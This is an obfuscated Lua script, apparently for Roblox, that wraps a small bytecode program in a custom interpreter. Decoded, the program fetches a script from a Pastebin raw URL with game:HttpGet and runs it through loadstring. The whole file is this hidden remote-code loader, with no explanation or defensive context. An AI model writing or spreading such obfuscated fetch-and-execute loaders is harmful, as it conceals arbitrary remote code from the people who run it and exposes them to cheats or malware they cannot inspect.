--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welco tobfus.com

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v30,16));if v19 then local v120=0;local v121;while true do if (v120==1) then return v121;end if (v120==0) then v121=v5(v87,v19);v19=nil;v120=1;end end else return v87;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + 1)) ;return v88-(v88%((1497 -(282 + 595)) -(555 + 64))) ;else local v89=(2568 -(1523 + 114)) -(857 + 74) ;local v90;while true do if (v89==(568 -(367 + 201))) then v90=(929 -(193 + 21 + 713))^(v32-(1 + 0)) ;return (((v31%(v90 + v90))>=v90) and (1 -0)) or (0 + (1065 -(68 + 997))) ;end end end end local function v21() local v34=1270 -(226 + 1044) ;local v35;while true do if (v34==(4 -3)) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (118 -(8 + 24 + 85)) ;v34=(958 -(892 + 65)) + 0 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v37 * (469 -213)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (353 -((345 -258) + 263)) );v18=v18 + (184 -(67 + 113)) ;return (v41 * (12302277 + 4474939)) + (v40 * (160901 -95365)) + (v39 * (189 + 67)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=953 -(802 + 150) ;local v45=(v20(v43,2 -1 ,36 -16 ) * ((2 + 0)^(1029 -(915 + 82)))) + v42 ;local v46=v20(v43,59 -38 ,19 + 12 );local v47=((v20(v43,41 -(4 + 5) )==1) and  -(1188 -(1069 + 118))) or (2 -1) ;if (v46==(0 -0)) then if (v45==0) then return v47 * (0 + 0) ;else v46=(1 -0) -0 ;v44=0 + 0 ;end elseif (v46==(2485 -(145 + 293))) then return ((v45==(791 -(368 + 423))) and (v47 * ((3 -2)/(18 -((440 -(44 + 386)) + (1494 -(998 + 488))))))) or (v47 * NaN) ;end return v8(v47,v46-(3934 -2911) ) * (v44 + (v45/((444 -(416 + 26))^(165 -113)))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v66=773 -(201 + 571) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 1002 -(241 + 761) ;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if (v91~= #"!") then else if (v92== #">") then v93=(function() return v94()~=(0 + 0) ;end)();elseif (v92==2) then v93=(function() return v95();end)();elseif (v92== #"nil") then v93=(function() return v96();end)();end v97[v98]=(function() return v93;end)();break;end if (v91==(0 -0)) then local v115=(function() return 0;end)();while true do if (v115==0) then v92=(function() return v94();end)();v93=(function() return nil;end)();v115=(function() return 1 + 0 ;end)();end if ((3 -2)==v115) then v91=(function() return  #"[";end)();break;end end end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v52=(function() return function(v99,v100,v101) local v102=(function() return 0 -0 ;end)();local v103=(function() return;end)();while true do if (v102==(374 -(123 + 251))) then v103=(function() return 0;end)();while true do if (v103~=0) then else local v122=(function() return 0 -0 ;end)();local v123=(function() return;end)();while true do if ((698 -(208 + 490))==v122) then v123=(function() return 0 + 0 ;end)();while true do if (v123==(0 + 0)) then local v154=(function() return 0 -0 ;end)();while true do if ((836 -(660 + 176))==v154) then v99[v100-#"}" ]=(function() return v101();end)();return v99,v100,v101;end end end end break;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #",",v57 do FlatIdent_2661B,Type,Cons,v21,v24,v25,v58,v68=(function() return v51(FlatIdent_2661B,Type,Cons,v21,v24,v25,v58,v68);end)();end v56[ #"91("]=(function() return v21();end)();for v69= #"<",v23() do local v70=(function() return v21();end)();if (v20(v70, #"~", #"}")==0) then local v106=(function() return 285 -(134 + 151) ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if (v106==(1665 -(970 + 695))) then local v118=(function() return 202 -(14 + 188) ;end)();while true do if ((676 -(534 + 141))==v118) then v106=(function() return 1 + 0 ;end)();break;end if (0~=v118) then else v107=(function() return v20(v70,1992 -(582 + 1408) , #"19(");end)();v108=(function() return v20(v70, #"asd1",20 -14 );end)();v118=(function() return 1 + 0 ;end)();end end end if (3==v106) then if (v20(v108, #"asd", #"gha")== #"~") then v109[ #".dev"]=(function() return v58[v109[ #"xnxx"]];end)();end v53[v69]=(function() return v109;end)();break;end if (v106~=1) then else v109=(function() return {v22(),v22(),nil,nil};end)();if (v107==(0 -0)) then local v125=(function() return 0 + 0 ;end)();local v126=(function() return;end)();while true do if (v125==(0 -0)) then v126=(function() return 0;end)();while true do if ((0 -0)==v126) then v109[ #"xxx"]=(function() return v22();end)();v109[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v107== #"[") then v109[ #"gha"]=(function() return v23();end)();elseif (v107==(243 -(187 + 54))) then v109[ #"91("]=(function() return v23() -((5 -3)^(9 + 7)) ;end)();elseif (v107~= #"91(") then else local v157=(function() return 0 + 0 ;end)();local v158=(function() return;end)();while true do if ((0 + 0)==v157) then v158=(function() return 396 -(115 + 281) ;end)();while true do if (0==v158) then v109[ #"xxx"]=(function() return v23() -((4 -2)^16) ;end)();v109[ #"0313"]=(function() return v22();end)();break;end end break;end end end v106=(function() return 2 -0 ;end)();end if (v106~=2) then else if (v20(v108, #"\\", #"\\")~= #"!") then else v109[1 + 1 ]=(function() return v58[v109[1638 -(1373 + 263) ]];end)();end if (v20(v108,2 + 0 ,4 -2 )~= #",") then else v109[ #"asd"]=(function() return v58[v109[ #"-19"]];end)();end v106=(function() return 3;end)();end end end end for v71= #"|",v23() do v54,v71,v28=(function() return v52(v54,v71,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1 -(320 -(53 + 267)) ];local v64=v60[2 -0 ];local v65=v60[1 + 2 ];return function(...) local v72=v63;local v73=v64;local v74=v65;local v75=v27;local v76=1385 -(746 + 638) ;local v77= -(1 + 0);local v78={};local v79={...};local v80=v12("#",...) -(342 -(218 + 123)) ;local v81={};local v82={};for v104=1581 -(1535 + 46) ,v80 do if (v104>=v74) then v78[v104-v74 ]=v79[v104 + (983 -(18 + 964)) ];else v82[v104]=v79[v104 + (3 -2) + 0 ];end end local v83=(v80-v74) + 1 + 0 ;local v84;local v85;while true do local v105=560 -(306 + 254) ;while true do if ((512<=3591) and (v105==(1 + 0))) then if (v85<=3) then if ((4795>402) and (v85<=(1 -0))) then if (v85==(1467 -(899 + 568))) then v82[v84[2 + 0 ]]();else v82[v84[4 -2 ]]={};end elseif (v85>((351 + 254) -(268 + 335))) then do return;end else local v131=v84[292 -(60 + 230) ];v82[v131]=v82[v131](v13(v82,v131 + 1 + 0 ,v77));end elseif (v85<=(577 -(426 + 146))) then if ((4813>3565) and (v85>(1 + 3))) then local v133=v84[1458 -(282 + 1174) ];local v134=v82[v84[814 -(569 + 242) ]];v82[v133 + 1 ]=v134;v82[v133]=v134[v84[(861 -(20 + 830)) -7 ]];else v82[v84[1 + 1 ]]=v84[1027 -(706 + 318) ];end elseif (v85<=(1257 -(721 + 530))) then v82[v84[2]]=v62[v84[1274 -(945 + 326) ]];elseif (v85==(16 -9)) then local v143=0;local v144;local v145;local v146;local v147;while true do if (v143==(1 + 0 + 0)) then v77=(v146 + v144) -(701 -(271 + 429)) ;v147=0 + 0 ;v143=1502 -(1408 + 92) ;end if (2==v143) then for v181=v144,v77 do local v182=1086 -(461 + 625) ;while true do if (v182==(1288 -(993 + 295))) then v147=v147 + 1 ;v82[v181]=v145[v147];break;end end end break;end if (v143==((126 -(116 + 10)) + 0)) then v144=v84[2];v145,v146=v75(v82[v144](v13(v82,v144 + (1172 -(31 + 387 + (1491 -(542 + 196)))) ,v84[6 -3 ])));v143=1;end end else local v148=0 + 0 ;local v149;local v150;local v151;local v152;local v153;while true do if ((3912==3912) and (v148==(1 + 0 + 1))) then v84=v72[v76];v153=v84[1 + 1 + 0 ];v152=v82[v84[1 + 2 ]];v82[v153 + ((191 + 339) -(406 + 123)) ]=v152;v82[v153]=v152[v84[1773 -(1749 + 20) ]];v76=v76 + 1 + (0 -0) ;v148=1325 -(1249 + 73) ;end if ((2821<=4824) and (v148==(9 -5))) then v77=(v151 + v153) -(1 + 0) ;v149=0;for v183=v153,v77 do v149=v149 + (1146 -(466 + 679)) ;v82[v183]=v150[v149];end v76=v76 + (2 -1) ;v84=v72[v76];v153=v84[2];v148=14 -9 ;end if (v148==(1903 -(106 + (3345 -(1126 + 425))))) then v84=v72[v76];v82[v84[1 + 1 ]]=v84[1 + (407 -(118 + 287)) ];v76=v76 + (2 -1) ;v84=v72[v76];v153=v84[5 -3 ];v150,v151=v75(v82[v153](v13(v82,v153 + (115 -(4 + 110)) ,v84[3])));v148=4;end if ((1738<=2195) and (v148==(590 -(57 + 527)))) then do return;end break;end if (v148==(1432 -(41 + 1386))) then v82[v153]=v82[v153](v13(v82,v153 + 1 ,v77));v76=v76 + (104 -(17 + 86)) ;v84=v72[v76];v82[v84[2 + 0 ]]();v76=v76 + (1 -0) ;v84=v72[v76];v148=17 -11 ;end if (v148==(166 -(122 + 44))) then v149=nil;v150,v151=nil;v152=nil;v153=nil;v82[v84[2 -0 ]]={};v76=v76 + 1 ;v148=3 -2 ;end if (v148==(1 + 0)) then v84=v72[v76];v82[v84[1 + 1 ]]=v62[v84[5 -2 ]];v76=v76 + (66 -(30 + 35)) ;v84=v72[v76];v82[v84[2]]=v62[v84[3 + (0 -0) ]];v76=v76 + (1258 -(1043 + 214)) ;v148=2;end end end v76=v76 + (3 -2) ;break;end if ((1212 -(323 + 889))==v105) then v84=v72[v76];v85=v84[2 -1 ];v105=581 -(361 + 219) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F32354538546A596D00094Q00087Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
